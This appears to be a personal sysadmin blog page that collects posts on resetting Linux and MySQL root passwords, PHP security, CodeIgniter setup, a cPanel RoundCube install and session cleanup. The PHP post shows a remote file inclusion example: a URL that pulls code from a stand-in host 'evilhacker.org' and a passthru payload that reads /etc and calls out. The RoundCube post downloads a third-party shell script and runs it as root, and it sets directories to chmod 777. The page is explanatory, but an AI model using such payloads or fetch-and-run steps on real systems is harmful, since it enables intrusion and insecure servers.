John Bernard Abella [blog]

To perform a system administrator task, you have to know the root password. What happens if you forgot your root password? Not to worry. Just reboot your PC and you can reset the root password by following these steps:

1. Reboot the PC(select reboot as you log out the of the GUI) or power up a usual.
   

   Soon you see the graphical boot loader on screen that shows the name of the operating systems you can boot. If your system runs with LILO boot loader, press Ctrl+X and at the boot prompt type linux single and press enter. Then proceed to step 4.

2. If you have more than one operating system installed, use the arrow key to select linux as operating system, then press the A key.

GRUB prompts you for commands to add to its defualt boot command.

3. Press the spacebar, type the following, and press enter:

single

Linux starts up as usual but runs in a single-user mode that do not require you to log in. After linux starts, you will see the following command line prompts that ends with a hash mark (#), similar to the following :

sh-2.05b#

4. Type the paswrd command to change the root password as follows:

sh-2.05b# passwd
Changing password for root user.
New password:

5. Type the new root password that you want to use (it doesn’t appear on screen) and then press enter.

Linux asks for the password again, like this:

Retype new password:

6. Type the new password again, and press enter.

If you enter the same password both times, the passwrd command changes the root password.

7. Now type reboot to reboot the PC.

After linux starts, it displays the familiar login screen. Now you can log in as root with the new password

‘Like locking your keys in the car, to forget your password after
you’ve spent an hour installing and tweaking a new MySQL server can be
an embarassment to say the least.’

Fortunately, if you have root access to that computer, all in NOT lost.

Here are the steps when you found yourself in this situation.

1. Kill the server process.
% kill pid
(where pid is the process id. Do not use kill -9 unless absolutely
necessary, as this may damage your table files)

2. Run safe-mysqld with the –skip-grant-tables command line option.
(This instructs the MySQL server to allow unrestricted access to
anyone) NOTE: restrict all remote access before issuing this command
% safe-mysqld --skip-grant-table

3. Change root password
mysql > use mysql;
mysql > update user set password = password('newpassword') where user
= 'root';

4. Disconnect and instruct the mysql server to reload the grants
tables to begin requiring passwords.
% mysqladmin flush-privileges

“That does it — and nobody ever has to know what you did. As for
locking your keys in your car, you’re on your own there.”

Must have for php-mysql beginners developers.

This article discusses the common threats and challenges of programming secure PHP applications and practical methods for doing so.

Introduction

The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.

Dangers

Files
PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

Example
On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:

http://example.com/page.php?i=aboutus.html

The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:

* Has the programmer considered directory traversals like i=../../../etc/passwd?
* Does he check for the .html extension?
* Does he use fopen() to include the files?
* Has he thought about not allowing remote files?

In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

http://example.com/page.php?i=http://evilhacker.org/exec.html

Where exec.html contains a couple of lines of code:

<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>

I am sure you get the idea. A lot of bad things can be done from here.
(more…)

Actually CodeIgniter framework (CI) is nearly zero configuration. First is to put your CI files to your webserver, in this example will be using the web root directory of my webserver.

Host : www.johnbernardabella.com
Database : localhost
Username : test
Password : test

After we need to modify system\application\config\config.php

Look for :

$config['base_url'] = ''

change to :

$config['base_url'] = "http://www.johnbernardabella.com/" //for we are using the web root of the server

Then Save.

Second is to open system\application\config\database.php

$db['default']['hostname'] = "localhost"; //Host of the database
$db['default']['username'] = "test"; //Username of the database
$db['default']['password'] = "test"; //Password of the database
$db['default']['database'] = "test"; // Database Name
$db['default']['dbdriver'] = "mysql"; // Database driver for this example I use mysql
$db['default']['dbprefix'] = ""; // Database prefix
$db['default']['pconnect'] = FALSE; // Connection type (pconnect of connect)

and you CI is now configured, it now able to connect the database.

Next topic would be tweaking defualt CI configuration.

First make sure you know your mysql root password, you have to replace DATABASEPASSWORD to your mysql root password.

If you have already used RoundCube installation please make sure you remove any traces of it with,


cd /usr/local/cpanel/base
rm -rf roundcube*
mysql -p -e 'drop database roundcube';
chattr -i /usr/local/cpanel/base/frontend/x/webmaillogin.html
chattr -i /usr/local/cpanel/base/webmaillogin.cgi
/scripts/upcp


You will have to specify your root password when prompted.

Now lets download roundcube first and chmod the directorys


cd /usr/local/cpanel/base
wget -O roundcube.tar.gz http://heanet.dl.sourceforge.net/sourceforge/roundcubemail/
roundcubemail-0.1-rc1.tar.gz
tar -zxvf roundcube.tar.gz
rm -rf roundcube.tar.gz
mv -f roundcubemail-0.1-rc1 roundcube
cd roundcube
chmod -R 777 temp
chmod -R 777 logs


Create the database and install the intial sql file. The following commands will do this for you.


mysql -e "CREATE DATABASE roundcube;" -pDATABASEPASSWORD
mysql -e "use roundcube; source SQL/mysql.initial.sql;" -pDATABASEPASSWORD


Now lets sort out the configuration


cd config
mv db.inc.php.dist db.inc.php
mv main.inc.php.dist main.inc.php


Now open db.inc.php

nano db.inc.php

Find


$rcmail_config['db_dsnw'] = 'mysql://roundcube:pass@localhost/roundcubemail';


Replace with


$rcmail_config['db_dsnw'] = 'mysql://root:DATABASEPASSWORD@localhost/roundcube';


Now Open main.inc.php

nano main.inc.php

Find


$rcmail_config['default_host'] = '';


Replace with


$rcmail_config['default_host'] = 'localhost';


Now we have to configure cPanel to show roundcube in the theme. Please note this is for the X theme(default) only!! If you use another theme please skip the next part and see below.


cd /usr/local/cpanel/base/roundcube/skins/default/images/
cp --reply=yes roundcube_logo.png /usr/local/cpanel/base/frontend/x/images/roundcube_logo.png
cp --reply=yes roundcube_logo.png /usr/local/cpanel/base/webmail/x/images/roundcube_logo.png
cd /usr/local/cpanel/base
wget http://www.hostgeekz.com/files/hostgeekz/HGpatch-roundcube-0.1-rc1
patch -p0 < HGpatch-roundcube-0.1-rc1


**NOTE** If you receive a message stating

Reversed (or previously applied) patch detected! Assume -R?

please press N for No as this is because you previously installed roundcube

This will auto do all the necessary changes to roundcube and the X theme.

Once the patch is executed you may now access roundcube via http://yourip/webmail

—–

If you do not use the X theme please do the following


cd /usr/local/cpanel/base
wget http://www.hostgeekz.com/files/hostgeekz/HGpatch-roundcube-NON-X-0.1-rc1
patch -p0 < HGpatch-roundcube-NON-X-0.1-rc1


Then open your webmaillogin.html, please replace YOURTHEME with the name of your theme.


nano /usr/local/cpanel/base/frontend/YOURTHEME/webmaillogin.html


and find

Add Below

RoundCube——

***UPDATE***
Remember to chattr +i the files or add the patch to your /scripts/upcp.


chattr +i /usr/local/cpanel/base/frontend/x/webmaillogin.html
chattr +i /usr/local/cpanel/base/webmaillogin.cgi


If you are using cPanel 11 ensure to run the following fix.


wget http://www.hostgeekz.com/files/hostgeekz/cpanel-11-fix.sh
chmod 700 cpanel-11-fix.sh
./cpanel-11-fix.sh
rm -f cpanel-11-fix.sh


That’s it! You may now access roundcube via http://yourip/webmail

Ive been handling webserver with more than 1000 website and lots of unique visitors per month. Session are stored on the server hard drive and every end of the month i need to clean it up.

Now i was puzzled by rm command.
rm -f *

in /tmp/ directory. The terminal choked and gave out:

-bash: /bin/rm: Argument list too long

Apparently there are a maximum number of files that can be passed to rm.

ls -1 | grep sess | wc -l

382611

wow 382611 session files! image how long it would take if you have an application that running with sessions.
The solution for this problem would be :

find . -name 'sess*' | xargs rm

Q10MUye8y4I